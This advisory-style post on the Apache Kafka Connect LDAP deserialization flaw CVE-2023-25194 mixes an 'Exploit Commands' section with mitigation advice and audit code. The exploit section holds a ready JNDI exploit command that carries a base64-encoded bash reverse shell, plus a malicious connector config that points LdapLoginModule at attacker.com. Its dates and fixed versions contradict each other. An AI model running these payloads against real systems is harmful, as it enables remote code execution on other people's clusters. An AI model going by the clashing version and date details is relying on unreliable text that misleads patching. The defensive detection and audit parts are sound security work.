Apache Kafka, LDAP Deserialization RCE, CVE-2023-25194 (Critical)

How the CVE Works:

The vulnerability lies in how Apache Kafka Connect handles SASL JAAS configuration. An attacker who holds `ALTER_CONFIG` privileges can set `sasl.jaas.config` to use `LdapLoginModule` and, by overriding a connector's client configuration (`producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config` or `admin.override.sasl.jaas.config`), force the Kafka Connect worker to authenticate against an attacker-controlled LDAP server. The worker then deserializes the untrusted LDAP response, which triggers Java deserialization gadget chains and leads to remote code execution (RCE) if exploitable classes are present on the classpath. Versions before 3.9.1/4.0.0 are vulnerable unless client overrides are explicitly restricted through a connector client override policy.

DailyCVE Form:

Platform: Apache Kafka
Version: <3.9.1/4.0.0
Vulnerability: LDAP Deserialization → RCE
Severity: Critical
Date: 2023-01-01

Prediction: Patch expected Q1 2023

What Undercode Says:

Analytics:

  • Attack Vector: Network (SASL/JAAS abuse)
  • Exploitability: Low (requires `ALTER_CONFIG` + LDAP control)
  • Impact: Full cluster compromise via RCE.

Exploit Commands:

1. Malicious LDAP Server Setup:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTAwMCAwPiYx}|{base64,-d}|{bash,-i}" -A 127.0.0.1

2. Kafka Connector Payload:

{
  "name": "evil-connector",
  "config": {
    "connector.class": "io.debezium.connector.mysql.MySqlConnector",
    "database.hostname": "mysql",
    "database.port": "3306",
    "producer.override.sasl.jaas.config": "com.sun.security.auth.module.LdapLoginModule required user.provider.url=\"ldap://attacker.com:1389/Exploit\";"
  }
}

Protection Commands:

1. Disable Vulnerable Modules:

export KAFKA_OPTS="-Dorg.apache.kafka.disallowed.login.modules=com.sun.security.auth.module.LdapLoginModule,com.sun.security.auth.module.JndiLoginModule"

2. Kafka Connect Policy Update:

connector.client.config.override.policy=PRINCIPAL

3. Version Upgrade:

wget https://archive.apache.org/dist/kafka/3.9.1/kafka_2.13-3.9.1.tgz && tar -xzf kafka_2.13-3.9.1.tgz

Code Snippets:

  • LDAP Payload Detection (Python):
    import re

    # Flag a JAAS config string that selects LdapLoginModule and points
    # user.provider.url at a directory server (the pattern used in this CVE).
    # The two tokens are separated by "required" in a real config, so the
    # pattern allows arbitrary text between them.
    def detect_ldap_config(config):
        return bool(re.search(r"LdapLoginModule.*user\.provider\.url", config, re.IGNORECASE | re.DOTALL))
    
  • Kafka ACL Lockdown:
    bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 --add --deny-principal User:Attacker --operation ALTER_CONFIGS --cluster
    

Mitigation Steps:

1. Audit all connector configurations for `sasl.jaas.config` overrides.

2. Restrict Kafka Connect REST API to trusted IPs.

3. Monitor JNDI/LDAP outbound connections from Kafka servers.
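The audit in step 1 can be automated against the connector listing that the Kafka Connect REST API returns from `GET /connectors?expand=config`. The script below is an added example, not code from the original post or from the Kafka project; the sample payload is constructed and the LDAP hostname in it is a placeholder.

```python
import re

# Login modules that can be abused through attacker-controlled LDAP/JNDI lookups.
DANGEROUS_MODULES = (
    "com.sun.security.auth.module.LdapLoginModule",
    "com.sun.security.auth.module.JndiLoginModule",
)
# Per-connector client override keys that replace the worker's JAAS config.
OVERRIDE_KEY = re.compile(r"^(producer|consumer|admin)\.override\.sasl\.jaas\.config$")
# Directory URL that the login module would be pointed at.
PROVIDER_URL = re.compile(
    r'user\.provider\.url\s*=\s*"?((?:ldaps?|rmi|dns)://[^\s";]+)', re.IGNORECASE
)


def audit_connector(name, config):
    """Return one finding per dangerous JAAS setting in a connector config dict."""
    findings = []
    for key, value in config.items():
        if key != "sasl.jaas.config" and not OVERRIDE_KEY.match(key):
            continue
        value = str(value)
        for module in DANGEROUS_MODULES:
            if module in value:
                url = PROVIDER_URL.search(value)
                findings.append({
                    "connector": name,
                    "key": key,
                    "module": module,
                    "url": url.group(1) if url else None,
                })
    return findings


def audit_connectors(payload):
    """payload: dict keyed by connector name, as returned by GET /connectors?expand=config."""
    findings = []
    for name, body in payload.items():
        findings.extend(audit_connector(name, body.get("config", {})))
    return findings


# Constructed sample mirroring the expanded REST listing (hostname is a placeholder).
SAMPLE = {
    "orders-sink": {"config": {
        "connector.class": "io.debezium.connector.mysql.MySqlConnector",
        "consumer.override.sasl.jaas.config":
            'org.apache.kafka.common.security.plain.PlainLoginModule required '
            'username="svc" password="REDACTED";',
    }},
    "evil-connector": {"config": {
        "connector.class": "io.debezium.connector.mysql.MySqlConnector",
        "producer.override.sasl.jaas.config":
            'com.sun.security.auth.module.LdapLoginModule required '
            'user.provider.url="ldap://ldap.example.invalid:1389/x";',
    }},
}

if __name__ == "__main__":
    for f in audit_connectors(SAMPLE):
        print(f"{f['connector']}: {f['key']} uses {f['module']} -> {f['url']}")
```

Only the override keys are inspected because those are the settings a connector author can change through `ALTER_CONFIG`; the worker's own `sasl.jaas.config` is reviewed separately in `connect-distributed.properties`.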

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
